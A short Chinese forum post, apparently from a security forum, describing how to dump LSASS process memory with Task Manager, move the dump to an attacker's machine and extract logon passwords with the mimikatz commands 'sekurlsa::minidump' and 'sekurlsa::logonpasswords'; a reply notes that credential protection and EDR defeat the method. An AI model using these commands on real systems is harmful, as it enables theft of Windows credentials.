使用task manager dumphash操作(非原創)
dump下來的文件位置如下,我們可以將此文件傳輸到我們的攻擊機
使用mimikatz將其解密
sekurlsa::minidump C:\lsass.DMP sekurlsa::logonpasswords
不是原创你发原创区?而且你这样直接读lsass内存,在高版本有las和凭据保护,也读不了。碰edr直接死 ... PYkiller 发表于 2022-3-4 17:29 [img]https://www.t00ls.com/images/common/back.gif[/img]